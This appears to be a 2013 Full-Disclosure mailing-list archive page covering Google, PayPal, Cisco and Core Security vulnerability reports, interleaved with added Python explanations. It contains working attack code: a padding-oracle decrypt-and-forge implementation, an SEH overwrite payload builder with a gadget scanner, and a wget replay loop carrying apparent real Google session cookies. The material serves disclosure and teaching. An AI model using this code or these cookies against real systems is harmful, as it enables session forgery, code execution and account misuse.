[Full-disclosure] Google Docs Clickjacking / Information Disclosure

2013-08-28 Thread Jacob Morgan
I reported this problem to Google in June but I did not get the usual reply
saying they were working on it, so I guess it isn't serious enough to be
fixed.

The problem is the page for requesting access to a private document. It
does not have any protection against being framed, so you can make a
private document, trick someone into clicking the button to request access
and get an email from Google Docs with their full name and email address.

PoC: http://buildism.net/files/GoogleDocsClickjacking2.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
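The report above turns on one missing response header. As an added example (not part of the original post, and not Google's headers), the following Python audits a set of HTTP responses for framing protection the way a tester would check the "request access" page: X-Frame-Options DENY/SAMEORIGIN and an enforcing CSP frame-ancestors directive count as protection; ALLOW-FROM, report-only CSP and invalid values do not. The hosts in SAMPLE_RESPONSES are hypothetical and the header sets are constructed.

```python
def framing_protection(headers):
    """Classify a response's headers: (protected, reason).

    headers: iterable of (name, value) pairs as most HTTP clients return them.
    Only X-Frame-Options and an enforcing CSP frame-ancestors directive stop a
    page from being framed; everything else leaves it open to clickjacking.
    """
    xfo_values, frame_ancestors = [], []
    for name, value in headers:
        n = name.strip().lower()
        if n == "x-frame-options":
            xfo_values.append(value.strip().upper())
        elif n == "content-security-policy":
            # frame-src/child-src restrict what *we* embed; only frame-ancestors
            # restricts who may embed us.
            for directive in value.split(";"):
                tokens = directive.split()
                if tokens and tokens[0].lower() == "frame-ancestors":
                    frame_ancestors.append([t.lower() for t in tokens[1:]])
        # Content-Security-Policy-Report-Only is ignored on purpose: it only
        # reports a framing violation, it never blocks the frame.

    # Every enforcing CSP policy must be satisfied, so one restrictive
    # frame-ancestors list is enough (and it overrides X-Frame-Options).
    for sources in frame_ancestors:
        if sources == ["'none'"]:
            return True, "CSP frame-ancestors 'none'"
        if not {"*", "http:", "https:"} & set(sources):
            return True, "CSP frame-ancestors limited to " + " ".join(sources)

    for v in xfo_values:
        if v in ("DENY", "SAMEORIGIN"):
            return True, "X-Frame-Options " + v
        if v.startswith("ALLOW-FROM"):
            return False, "X-Frame-Options ALLOW-FROM is not honoured by every browser"
        return False, "invalid X-Frame-Options value %r is ignored by browsers" % v

    return False, "no X-Frame-Options and no CSP frame-ancestors: the page can be framed"


def frameable_pages(responses):
    """responses: {url: [(header, value), ...]} -> URLs an attacker can frame."""
    return [url for url, hdrs in responses.items() if not framing_protection(hdrs)[0]]


# Constructed sample responses (hypothetical hosts, not headers captured from Google).
SAMPLE_RESPONSES = {
    "https://docs.example/request-access": [
        ("Content-Type", "text/html; charset=utf-8"),
    ],
    "https://docs.example/edit": [
        ("Content-Type", "text/html"),
        ("X-Frame-Options", "SAMEORIGIN"),
    ],
    "https://accounts.example/login": [
        ("Content-Security-Policy", "default-src 'self'; frame-ancestors 'none'"),
    ],
    "https://widgets.example/embed": [
        ("Content-Security-Policy", "frame-ancestors *"),
        ("X-Frame-Options", "ALLOW-FROM https://partner.example"),
    ],
}

if __name__ == "__main__":
    for url in frameable_pages(SAMPLE_RESPONSES):
        print("frameable:", url, "->", framing_protection(SAMPLE_RESPONSES[url])[1])
```

Run against real targets, feed it the header list from each response of interest; any page that changes state on a single click and comes back as frameable is a clickjacking candidate, and a JavaScript frame-buster alone does not change that verdict.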

[Full-disclosure] PayPal's "invalid" aksession Padding Oracle Flaw

2013-08-28 Thread Timothy D. Morgan
The main PayPal web site sets a cookie named "aksession" which
contains a blob of base64-encoded ciphertext. This ciphertext is
encrypted using a 64-bit block cipher in CBC mode and does not have
any other integrity protection. Naturally, this means the aksession
cookie is vulnerable to a padding oracle attack allowing full
decryption and forgery.

Here's an example of an aksession cookie:

1371856787~id=cookieMOF13DX8hKxMUVKWTDJ4Mp6lam2TdbUs44BJ7iduOubp9+zII2ZAWPz9C9HM3GQDGNhUPxyHZ9eHF9kkF6BYdLaRYxMIpGlMYgobM+FYnB8//iMqth8sT/wrigUy4jnV1OLnkkE2g4x=

The ciphertext begins immediately after the "cookie" string.  The
base64 value's first 8 bytes is the random initialization vector.  The
decrypted plaintext contains:

expiretime=1371856787&sessionip=61.183.192.0&strategy=0&scriptid=&challenge=0&seedid=PRI

This flaw currently still exists in the PayPal site.  PayPal was
notified through their bug bounty program, but they determined that
this flaw is "invalid" and does not deserve a bounty.  They said it
would be fine to publish it.

To be fair, this cookie does indeed contain no sensitive information.
However, I think it may be a bit short-sighted of PayPal to discount
this issue, since there are several potentially interesting parameters
in the plaintext that could be forged by an attacker.  I have only
ever observed plaintext values like the one above (that is, with
several parameters blank or "0"), so I can't tell for sure what they
are used for.  PayPal never confirmed for me whether or not they
investigated attack scenarios involving modification of the parameters.
(In general, their responses were incredibly terse and unhelpful.)
I've decided it isn't worth more of my time trying to fuzz these
parameters, but perhaps someone else will get lucky.


I figured I could at least use this issue as an educational
opportunity-- I've created a short video which demonstrates how to
identify and exploit this problem using the Bletchley[1] toolkit:
   http://youtu.be/qqNgcc9v_DQ

If you are interested in learning more, note that I'll be giving a
2-day training course[2] at AppSecUSA 2013 which will cover exploitation of a
wide variety of common cryptography implementation problems, including
padding oracle flaws.


Finally, for those keeping score, here's a disclosure timeline:

 2013-06-22
 Initial notification with vulnerability details

 2013-06-24
 Form-letter response from PayPal

 2013-06-28
 Sent follow up with exploit script.

 2013-07-12
 Asked for an update from PayPal.  PayPal responded that the evaluation
 is still "in process".

 2013-07-15
 PayPal indicated that the bug is not eligible for a bounty because:
 "This cookie doesnt contain any sensitive information."

 2013-07-15
 Responded to PayPal urging them to investigate the possibility of
 malicious modification of parameters within the cookie, since doing
 this exhaustively in a black box way requires a great deal of effort.

 2013-08-06
 After being ignored in the prior email, asked PayPal if it would be ok
 to publish this flaw.

 2013-08-07
 PayPal responded with:
 "This bug does not contain any sensitive data and we have determined it
  is invalid. You may publish your findings regarding this bug."


Enjoy,
tim
@ecbftw


1. https://code.google.com/p/bletchley/

2. http://sched.co/19n00R5

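The attack Tim describes, as an added worked example that is not his code and not the Bletchley toolkit: a CBC cookie with an 8-byte IV, PKCS#5 padding and no MAC, a server that leaks only whether padding was valid, and an attacker who uses that bit both to decrypt the cookie and to forge one with chosen parameters (CBC-R). The 64-bit block cipher is a stand-in Feistel construction built on SHA-256, because the attack never needs to look inside it; the key, the plaintext strings and the oracle function are constructed for the demo.

```python
import hashlib
import os

BLOCK = 8  # 64-bit block cipher in CBC mode, as the post describes

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(half, key, rnd):
    # Round function of the stand-in 8-round Feistel cipher (built on SHA-256).
    # The attack treats the cipher as a black box, as it would DES or Blowfish.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:4]

def block_cipher(key, blk, decrypt=False):
    l, r = blk[:4], blk[4:]
    for i in (reversed(range(8)) if decrypt else range(8)):
        l, r = r, _xor(l, _f(r, key, i))
    return r + l

def pad(data):  # PKCS#5: 1..8 bytes, each equal to the count
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(block_cipher(key, ct[i:i + BLOCK], decrypt=True), prev)
        prev = ct[i:i + BLOCK]
    return out

def encrypt_cookie(key, plaintext):
    # Server side: random IV, CBC, padding, and no MAC over the result.
    pt, prev = pad(plaintext), os.urandom(BLOCK)
    out = prev
    for i in range(0, len(pt), BLOCK):
        prev = block_cipher(key, _xor(pt[i:i + BLOCK], prev))
        out += prev
    return out  # IV || C1 || ... || Cn

def padding_oracle(key, token):
    # The one bit the server leaks: does IV||CT decrypt to valid padding?
    try:
        unpad(cbc_decrypt(key, token[:BLOCK], token[BLOCK:]))
        return True
    except ValueError:
        return False

def recover_intermediate(oracle, target):
    """Recover D_k(target), the raw block decryption of one ciphertext block,
    from yes/no oracle answers alone (at most 256 queries per byte)."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padv = BLOCK - pos  # padding value we aim to produce
        for guess in range(256):
            prefix = bytearray(BLOCK)
            prefix[pos] = guess
            for j in range(pos + 1, BLOCK):  # bytes already recovered
                prefix[j] = inter[j] ^ padv
            if not oracle(bytes(prefix) + target):
                continue
            if pos == BLOCK - 1:
                # 01 is not the only valid ending (02 02, 03 03 03, ...): flip
                # the byte before it and make sure the padding still holds.
                prefix[pos - 1] ^= 0xFF
                if not oracle(bytes(prefix) + target):
                    continue
            inter[pos] = guess ^ padv
            break
        else:
            raise RuntimeError("oracle accepted no byte at position %d" % pos)
    return bytes(inter)

def decrypt_with_oracle(oracle, token):
    blocks = [token[i:i + BLOCK] for i in range(0, len(token), BLOCK)]
    return unpad(b"".join(_xor(recover_intermediate(oracle, cur), prev)
                          for prev, cur in zip(blocks, blocks[1:])))

def forge_with_oracle(oracle, plaintext):
    """Encrypt a chosen plaintext without the key: pick the last block at
    random and walk backwards, choosing each earlier block so that
    D_k(next) XOR block is the plaintext block wanted; the IV comes last."""
    pt = pad(plaintext)
    chain = [os.urandom(BLOCK)]
    for i in range(len(pt) - BLOCK, -1, -BLOCK):
        chain.append(_xor(recover_intermediate(oracle, chain[-1]), pt[i:i + BLOCK]))
    return b"".join(reversed(chain))  # IV || C1 || ... || Cn

if __name__ == "__main__":
    key = os.urandom(16)  # server secret; the attacker never sees it
    oracle = lambda token: padding_oracle(key, token)
    token = encrypt_cookie(key, b"expiretime=1371856787&strategy=0&challenge=0")
    print(decrypt_with_oracle(oracle, token))
    forged = forge_with_oracle(oracle, b"expiretime=1999999999&strategy=1&challenge=1")
    print(unpad(cbc_decrypt(key, forged[:BLOCK], forged[BLOCK:])))
```

The forgery is the part PayPal's "no sensitive information" answer does not address: the oracle is enough to mint a cookie with any expiretime, strategy or challenge value the server will decrypt cleanly, so whether that matters depends entirely on what those parameters gate. The fix is the usual one: authenticate the ciphertext (an HMAC over IV and ciphertext, verified before decryption, or an AEAD mode) so that a bad-padding path is never reachable by an attacker.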


[Full-disclosure] Cisco Security Advisory: Cisco Secure Access Control Server Remote Command Execution Vulnerability

2013-08-28 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Cisco Security Advisory: Cisco Secure Access Control Server Remote Command 
Execution Vulnerability

Advisory ID: cisco-sa-20130828-acs

Revision 1.0

For Public Release 2013 August 28 16:00  UTC (GMT)

+--

Summary
===

A vulnerability in the EAP-FAST authentication module of Cisco Secure Access 
Control Server (ACS) versions 4.0 through 4.2.1.15 could allow an 
unauthenticated, remote attacker to execute arbitrary commands on the Cisco 
Secure ACS server. This vulnerability is only present when Cisco Secure ACS is 
configured as a RADIUS server.

The vulnerability is due to improper parsing of user identities used for 
EAP-FAST authentication. An attacker could exploit this vulnerability by 
sending crafted EAP-FAST packets to an affected device. An exploit could allow 
the attacker to execute arbitrary commands on the Cisco Secure ACS server and 
take full control of the affected server.

There are no workarounds for this vulnerability.

Cisco has released free software updates that address this vulnerability. This 
advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130828-acs
-BEGIN PGP SIGNATURE-
Version: GnuPG/MacGPG2 v2.0.20 (Darwin)

iF4EAREKAAYFAlId9U8ACgkQUddfH3/BbTq1hgD9E1+zaqDXuMB+3vutKxeVWOm1
SZu8LlzZCoI7y+J9fnYA/2PiBWLsMJULUwdntZGqimWru7mXOe8OSQhaYJSglW3r
=6OJl
-END PGP SIGNATURE-



Re: [Full-disclosure] CAPTCHA re-riding attack in https://google.com

2013-08-28 Thread Alex


I don't see a captcha bypass, all I see is a wget command with Cookie
and Session ID and such. 

while true; do echo "Yes, I am blind!"; done 

On 2013-08-26 18:04, kevin philips wrote: 

> Hi Adam, 
> As discussed, this issue is just a captcha bypass problem. Apart from this case, I 
> don't know whether Google still uses this captcha somewhere or not :). Anyway, thank 
> you Adam! Your reply is a very clear way to explain it. 
> See more: 
> https://www.owasp.org/index.php/Testing_for_Captcha_(OWASP-AT-008) [1]
> 
> Cheers, 
> ~g4mm4 
> 
> On Mon, Aug 26, 2013 at 10:34 PM, adam  wrote:
> 
> What exactly is a re-riding attack? Is that just another name for replay? And 
> does this only work in the sorry/continue context for google.com [2]? If so, 
> I don't think it's really that big of a deal either. Repeated requests, 
> typically, are the cause of the sorry/continue page, so I can't see how 
> _more_ repeated requests will somehow solve that. To be clear: sure, I get 
> that for the time being - you're able to circumvent the captcha - if I'm 
> understanding correctly. However, in this case, that captcha is only a 
> courtesy anyway. It's the middle ground between normal user and infected 
> machine/bot, where they give you a little extra leniency before totally 
> banning you anyway. If I'm misunderstanding, or if it applies on a wider 
> scale than that, please let me know. 
> 
> On Mon, Aug 26, 2013 at 12:07 AM, kevin philips  wrote: 
> 
> folks,
> I found a CAPTCHA re-riding attack issue in https://google.com [3].
> PoC:
> Loop the request with the correct captcha (in this case the value of the captcha is 
> coppro):
> 
> while true; do wget --header="Cookie: PREF=ID=44ba1c9fba493ea4:U=e326f1400e3cc5b1:LD=vi:TM=1343010889:LM=1361717433:S=2dw8AygnrF9_TW_I; NID=67=mwocoU0FoMG_dewxiEO3zDc7LLQtKVabiaezQsipcVb-020jysQ9qfngMTyIYNGsub8G7eQBqQPuTXUAO3GJVFZZWjF4tawOwj0KGaRTbw27z0ZEuZtSN-98hX1KedvpY_rzoHyd-InVhDtoG9dqONDS88RmP8JxgZAz7GhtH_QWpTk1WUIY4WTMb6AQ5f58oYUlgQ; SID=DQAAAMEeueuQrtMIKY0NaJovAs1RyF3U1GgJWaoy5UBsCcZV3i2BF5jflSj7nG8YhPQoAe5kwE0eBjJzqeEafDuSTuTaTAGECW0rv2Fw1SQ8NHRzf9m4ymwerpALiHDeHUUlOlWmbrhXzjVm_RMkfvqohuwmHHAHPJKi-8MyKQbjiQd5lGEIH0JArQ8lUEuuqRRVUjBsTXis1TPqQWwHcHY5Chtm2ZOhZxoy2Xj59q8s_eC-Gj5YJ70jisfQrIWjhbjWeB3HvFVXinAWUVdvA6_5VbJ1; HSID=ACvpz7M2xPdk68Q6x; APISID=C9DV1u24Umr1AfnD/AfEqGieNRVPzU6fur; GDSESS=ID=cba44dffe2e20f09:TM=1374658124:C=c:IP=123.30.135.76-:S=APGng0snWLymjFQpx5DRXTM0yyoZnM5h5w" "http://www.google.com.vn/sorry/Captcha?continue=http%3A%2F%2Fwww.google.com.vn%2Fsearch%3Fq%3Dcaptcha%2Bre%2Briding%2Battack%26client%3Dubuntu%26channel%3Dcs%26oq%3Dcaptcha%2Bre%2Briding%2Battack%26aqs%3Dchrome.0.69i57j69i65.6126j0%26sourceid%3Dchrome%26ie%3DUTF-8&id=17901488348886592341&captcha=coppro&submit=G%E1%BB%ADi" -qd; done
> 
> By abusing this bug, malware, automation scanners, zombie computers and SEO bots can 
> bypass the Google captcha with the correct initial captcha value for malicious 
> actions. 
> 
> References:
> https://blog.whitehatsec.com/top-ten-web-hacking-techniques-of-2012/ [5]
> http://gursevkalra.blogspot.com/2012/03/captcha-re-riding-attack.html [6] 
> 
> Updated: Sadly, the Google Security Team considers the "captcha re-riding attack" in 
> this case not a critical bug. Well, I decided to post to Full Disclosure for 
> more discussion.
> 
> ~g4mm4 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html [7]
> Hosted and sponsored by Secunia - http://secunia.com/ [8]

-- 
--g4mm4 




Links:
--
[1] https://www.owasp.org/index.php/Testing_for_Captcha_(OWASP-AT-008)
[2] http://google.com
[3] https://google.com
[4] http://www.google.com.vn/sorry/Captcha?continue=http%3A%2F%2Fwww.google.com.vn%2Fsearch%3Fq%3Dcaptcha%2Bre%2Briding%2Battack%26client%3Dubuntu%26channel%3Dcs%26oq%3Dcaptcha%2Bre%2Briding%2Battack%26aqs%3Dchrome.0.69i57j69i65.6126j0%26sourceid%3Dchrome%26ie%3DUTF-8&id=17901488348886592341&captcha=coppro&submit=G%E1%BB%ADi
[5] https://blog.whitehatsec.com/top-ten-web-hacking-techniques-of-2012/
[6] http://gursevkalra.blogspot.com/2012/03/captcha-re-riding-attack.html
[7] http://lists.grok.org.uk/full-disclosure-charter.html
[8] http://secunia.com/
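The thread never spells out what makes a CAPTCHA "re-ridable" or what the fix looks like, so here is an added example in Python; it is not code from the report, from Google or from the referenced blog posts. ReplayableCaptcha shows the server-side pattern the wget loop exploits: a challenge id that stays valid after it has been solved, so the same id/answer pair verifies forever. SingleUseCaptcha shows the fix: the challenge is bound to the session it was issued to, expires, and is deleted on the first verification attempt whether right or wrong. The answer "coppro" is the one in the report; session ids, the TTL and the in-memory store are constructed.

```python
import secrets
import time


class ReplayableCaptcha:
    """The pattern behind a re-riding attack: the challenge stays valid after a
    correct answer, so one solved (id, answer) pair can be submitted forever."""

    def __init__(self):
        self._challenges = {}  # challenge id -> expected answer

    def issue(self, answer, session):
        cid = secrets.token_hex(8)
        self._challenges[cid] = answer
        return cid

    def verify(self, cid, answer, session):
        return self._challenges.get(cid) == answer


class SingleUseCaptcha:
    """A challenge is bound to the session it was shown to, expires, and is
    deleted on the first verification attempt, whether right or wrong."""

    def __init__(self, ttl=300, clock=time.monotonic):
        self._challenges = {}  # challenge id -> (answer, session, expiry)
        self._ttl, self._clock = ttl, clock

    def issue(self, answer, session):
        cid = secrets.token_hex(8)
        self._challenges[cid] = (answer, session, self._clock() + self._ttl)
        return cid

    def verify(self, cid, answer, session):
        entry = self._challenges.pop(cid, None)  # consumed on first use
        if entry is None:
            return False
        expected, owner, expiry = entry
        if self._clock() > expiry or owner != session:
            return False
        return secrets.compare_digest(expected.encode(), answer.encode())


def replay_attack(service, cid, answer, session, attempts):
    """Model the 'while true; do wget ...; done' loop from the report: how many
    of `attempts` resubmissions of the same id/answer pair are accepted."""
    return sum(service.verify(cid, answer, session) for _ in range(attempts))


if __name__ == "__main__":
    for cls in (ReplayableCaptcha, SingleUseCaptcha):
        svc = cls()
        cid = svc.issue("coppro", session="SID=example")
        ok = replay_attack(svc, cid, "coppro", "SID=example", 100)
        print("%s accepted %d of 100 replays" % (cls.__name__, ok))
```

Two details matter in practice: the challenge store has to be shared by every front-end that can receive the verification (a per-process dict lets an attacker replay against a different node), and deleting the entry on a wrong answer is what stops the id from being used to brute-force the answer.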

[Full-disclosure] rhev-hypervisor6 package security update

2013-08-28 Thread Osama Alrashid
Redhat has released a security update for rhev-hypervisor6 package.

Check this url:
http://rhn.redhat.com/errata/RHSA-2013-1181.html

Thanks
Alrashid
http://www.itsecuritycenter.com/

[Full-disclosure] [CORE-2013-0805] Aloaha PDF Suite Buffer Overflow Vulnerability

2013-08-28 Thread CORE Advisories Team
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Aloaha PDF Suite Buffer Overflow Vulnerability


1. *Advisory Information*

Title: Aloaha PDF Suite Buffer Overflow Vulnerability
Advisory ID: CORE-2013-0805
Advisory URL:
http://www.coresecurity.com/advisories/aloaha-pdf-suite-buffer-overflow-vulnerability
Date published: 2013-08-28
Date of last update: 2013-08-28
Vendors contacted: Aloaha Software
Release mode: User release


2. *Vulnerability Information*

Class: Buffer overflow [CWE-119]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-4978


3. *Vulnerability Description*

Aloaha PDF Suite [1], [2] is prone to a security vulnerability when
processing PDF files. This vulnerability could be exploited by a remote
attacker to execute arbitrary code on the target machine by enticing
Aloaha users to open a specially crafted PDF file.


4. *Vulnerable Packages*

   . AloahaPDFViewer v5.0.0.7.
   . Older versions are probably affected too, but they were not checked.

5. *Vendor Information, Solutions and Workarounds*

There was no official answer from Aloaha after several attempts to
report this vulnerability (see [Sec. 8]). As a mitigation, given
that this is a client-side vulnerability, avoid opening untrusted PDF
files. Contact the vendor for further information.


6. *Credits*

This vulnerability was discovered and researched by Marcos Accossatto
from CORE Exploit Writers Team.


7. *Technical Description / Proof of Concept Code*

Below is the result of opening the maliciously crafted PDF file [3]:


/-
$+B6BB8  >|>  8B07  |MOV EAX,DWORD PTR DS:[EDI]
$+B6BBA  >|.  C740 14 1E00  |MOV DWORD PTR DS:[EAX+14],1E;  <
Exception - Tries to write to 909090A4
$+B6BC1  >|.  8B5424 04 |MOV EDX,DWORD PTR SS:[ESP+4]
$+B6BC5  >|.  8950 18   |MOV DWORD PTR DS:[EAX+18],EDX
$+B6BC8  >|.  8BC7  |MOV EAX,EDI
$+B6BCA  >|.  8B10  |MOV EDX,DWORD PTR DS:[EAX]
-/

At that time, the registers 'EDX', 'EBX', 'EBP' and 'EDI' point to the
shellcode; the 'EAX' register contains the first 'DWORD' of our shellcode:

/-
EAX 90909090
ECX 07B4
EDX 0012DD44 ASCII "DD..."
EBX 051ACFF1 ASCII "DD..."
ESP 0012D9EC
EBP 0012DC54 ASCII "DD..."
ESI 02F0
EDI 0012DB78
EIP 03727BBA
C 0  ES 0023 32bit 0()
P 1  CS 001B 32bit 0()
A 0  SS 0023 32bit 0()
Z 0  DS 0023 32bit 0()
S 0  FS 003B 32bit 7FFDF000(FFF)
T 0  GS  NULL
D 0
O 0  LastErr ERROR_NOT_ENOUGH_MEMORY (0008)
EFL 0206 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty 16312.144994243513790
ST1 empty 3869.8214873218676080
ST2 empty -0.0
ST3 empty -0.0
ST4 empty 1.000
ST5 empty 4.398046511104000e+12
ST6 empty 5.307858023350276e+15
ST7 empty 5.0609752291423027300e+17
   3 2 1 0  E S P U O Z D I
FST 0020  Cond 0 0 0 0  Err 0 0 1 0 0 0 0 0  (GT)
FCW 037F  Prec NEAR,64  Mask1 1 1 1 1 1

-/

The stack's exception handler is overwritten with:

/-
0012D9EC   F94D
0012D9F0   000A
     
0012DB5C   0EDDE2F1
0012DB60   909006EB  Pointer to next SEH record
0012DB64   1106D8A0  SE handler
-/

In the address '1106D8A0' of 'AloahaTranslator.dll' we have:


/-
1106D8A0   .  83C4 14   ADD ESP,14
1106D8A3   .  C3RETN
-/

and the stack:


/-
$ ==>> 7C9032A8  RETURN to ntdll.7C9032A8
$+4  > 0012D704
$+8  > 0012DB60
$+C  > 0012D720
$+10 > 0012D6D8
$+14 > 0012DB60  Pointer to next SEH record
-/

So, the 'RETN' of '1106D8A3' will jump to '12DB60' (the stack) where our
shellcode is located:

/-
0012DB60   EB 06 JMP SHORT 0012DB68
0012DB62   90NOP
0012DB63   90NOP
0012DB64   A0 D8061190   MOV AL,BYTE PTR DS:[901106D8]
0012DB69   90NOP   
-/

which means the normal execution flow can be altered in order to execute
arbitrary code.


8. *Report Timeline*

. 2013-08-06:
Core Security Technologies notifies the Aloaha team of the
vulnerability. Publication date is set for Aug 27th, 2013.

. 2013-08-06:
Vendor asks for a report with technical information.

. 2013-08-06:
Technical details and proof of concept sent to Aloaha team.

. 2013-08-12:
Core asks for a status update and notifies the advisory publication was
scheduled for Aug 27th. No reply received.

. 2013-08-20:
Core attempts to contact vendor.

. 2013-08-26:
Core attempts to contact vendor.

. 2013-08-27:
Release date missed.

. 2013-08-28:
After 3 attempts to contact vendor, the advisory CORE-2013-0805 is
published as 'user release'.


9. *References*

[1] http://www.aloaha.com.
[2] http://www.aloaha.com/wi-software-en/aloaha-pdf-suite-freeware.php.
[3]
http://www.coresecurity.com/system/files/attachments/2013/08/CORE-2013-0805-aloaha-poc-94238712635.zip.



10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with a
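The chain the advisory walks through in section 7, reassembled as an added Python example (not Core's PoC and not code from the advisory): the eight bytes that overwrite the SEH record (nSEH = JMP SHORT +6, which hops over two NOPs and the four-byte handler address; SEH = 0x1106D8A0), why a gadget of the form ADD ESP,14 ; RETN lands on that record (the nSEH pointer sits at [ESP+0x14] in the dispatcher frame shown in the stack dump), and a scan for the same gadget bytes in a module image that discards addresses containing a NUL. SEH_HANDLER, RECORD_ADDR and DISPATCHER_FRAME are copied from the advisory's dumps; FAKE_IMAGE and its base address are constructed, and nothing here reproduces the crafted PDF, whose layout the advisory does not give.

```python
import struct

# Gadget bytes for "ADD ESP,14 ; RETN" (83 C4 14 C3), the sequence the
# advisory finds at 1106D8A0 in AloahaTranslator.dll.
ADD_ESP_14_RETN = b"\x83\xc4\x14\xc3"


def seh_record(handler, skip=6):
    """Bytes that overwrite one SEH record: nSEH = JMP SHORT +skip padded
    with NOPs, SEH = address of a gadget that returns into the stack."""
    nseh = b"\xeb" + struct.pack("b", skip) + b"\x90\x90"
    return nseh + struct.pack("<I", handler)


def short_jmp_target(at, skip):
    """Target of the 2-byte JMP SHORT placed at address `at`."""
    return at + 2 + skip


def retn_target(frame, add_esp):
    """Where ADD ESP,add_esp ; RETN transfers control, given the exception
    dispatcher's stack frame as the list of dwords starting at ESP."""
    return frame[add_esp // 4]


def find_gadgets(image, base, pattern=ADD_ESP_14_RETN):
    """Addresses of `pattern` in a module image loaded at `base`, skipping
    addresses that contain a NUL byte (they would truncate a text payload)."""
    found, i = [], image.find(pattern)
    while i != -1:
        addr = base + i
        if b"\x00" not in struct.pack("<I", addr):
            found.append(addr)
        i = image.find(pattern, i + 1)
    return found


def walk(frame, record_addr, skip=6):
    """Follow the chain the advisory describes: the gadget's RETN pops the
    nSEH slot from the dispatcher frame, and the JMP SHORT there hops over
    the NOPs and the handler address into the shellcode."""
    landing = retn_target(frame, 0x14)
    assert landing == record_addr, "RETN does not land on the SEH record"
    return [landing, short_jmp_target(landing, skip)]


# Values taken from the advisory's dumps.
SEH_HANDLER = 0x1106D8A0
RECORD_ADDR = 0x0012DB60
DISPATCHER_FRAME = [0x7C9032A8, 0x0012D704, 0x0012DB60,
                    0x0012D720, 0x0012D6D8, 0x0012DB60]  # $ .. $+14

# Constructed module image: the gadget at offset 0x101 (address free of NUL
# bytes) and again at offset 0x200 (address ends in 00, so it is rejected).
FAKE_BASE = 0x11060000
FAKE_IMAGE = (b"\x90" * 0x101 + ADD_ESP_14_RETN
              + b"\xcc" * (0x200 - 0x105) + ADD_ESP_14_RETN)

if __name__ == "__main__":
    print(seh_record(SEH_HANDLER).hex())  # eb069090a0d80611, as on the stack
    print([hex(a) for a in walk(DISPATCHER_FRAME, RECORD_ADDR)])
    print([hex(a) for a in find_gadgets(FAKE_IMAGE, FAKE_BASE)])
```

The +6 displacement is not arbitrary: the JMP SHORT itself is two bytes, and the bytes after it (two NOPs plus the handler address A0 D8 06 11) would otherwise be executed as the MOV AL instruction the advisory shows at 0012DB64. Any ADD ESP,X ; RETN (or the classic POP/POP/RETN) works as the handler as long as X reaches the nSEH slot of the dispatcher frame.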

[Full-disclosure] CORE-2013-0808 - EPS Viewer Buffer Overflow Vulnerability

2013-08-28 Thread CORE Advisories Team
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

EPS Viewer Buffer Overflow Vulnerability


1. *Advisory Information*

Title: EPS Viewer Buffer Overflow Vulnerability
Advisory ID: CORE-2013-0808
Advisory URL:
http://www.coresecurity.com/advisories/eps-viewer-buffer-overflow-vulnerability
Date published: 2013-08-28
Date of last update: 2013-08-28
Vendors contacted: EPS Viewer Team
Release mode: User release


2. *Vulnerability Information*

Class: Buffer overflow [CWE-119]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-4979


3. *Vulnerability Description*

EPS Viewer [1], [2] is prone to a security vulnerability when processing
EPS files. This vulnerability could be exploited by a remote attacker to
execute arbitrary code on the target machine by enticing EPS Viewer
users to open a specially crafted EPS file (client-side vulnerability).


4. *Vulnerable Packages*

   . EPS viewer v3.2.
   . Older versions are probably affected too, but they were not checked.


5. *Vendor Information, Solutions and Workarounds*

There was no official answer from the EPS team after several attempts to
report this vulnerability (see [Sec. 8]). As a mitigation, given
that this is a client-side vulnerability, avoid opening untrusted EPS
files. Contact the vendor for further information.


6. *Credits*

This vulnerability was discovered and researched by Daniel Kazimirow
from Core Exploit Writers Team. The publication of this advisory was
coordinated by Fernando Miranda from Core Advisories Team.


7. *Technical Description / Proof of Concept Code*

Below is the result of opening the maliciously crafted EPS file
[3]; it shows that the normal execution flow can be altered in order to
execute arbitrary code.

/-
10089B0E   .  8BFF  MOV EDI,EDI
10089B10   >  8B46 08   MOV EAX,DWORD PTR DS:[ESI+8] ; 
<--- crash  (we control ESI)
10089B13   .  8B48 0C   MOV ECX,DWORD PTR DS:[EAX+C]
10089B16   .  830E FE   OR DWORD PTR DS:[ESI],FFFE
10089B19   .  85C9  TEST ECX,ECX
10089B1B   .  8B7E 04   MOV EDI,DWORD PTR DS:[ESI+4]
10089B1E   .  74 0C JE SHORT gsdll32.10089B2C
10089B20   .  50PUSH EAX
10089B21   .  57PUSH EDI
10089B22   .  8D56 10   LEA EDX,DWORD PTR DS:[ESI+10]
10089B25   .  52PUSH EDX
10089B26   .  53PUSH EBX
10089B27   .  FFD1  CALL ECX
   ;  jump to our code
-/

The vulnerability exists in the gsdll32.dll module:

/-
Executable modules, item 1
 Base=1000
 Size=00A93000 (11087872.)
 Entry=102162B0 gsdll32.
 Name=gsdll32
 Path=C:\Program Files\EPSViewer\gsdll32.dll

EAX 035126E0 ASCII
"TTTTUVWXYZXYUU
ECX 
EDX 0028
EBX 0358A058
ESP 0012DA98
EBP 54545454
ESI 54544545
EDI 0038
EIP 10089B10 gsdll32.10089B10
C 1  ES 0023 32bit 0()
P 0  CS 001B 32bit 0()
A 0  SS 0023 32bit 0()
Z 0  DS 0023 32bit 0()
S 1  FS 003B 32bit 7FFDE000(FFF)
T 0  GS  NULL
D 0
O 0  LastErr ERROR_SUCCESS ()
EFL 0283 (NO,B,NE,BE,S,PO,L,LE)
ST0 empty 0.0
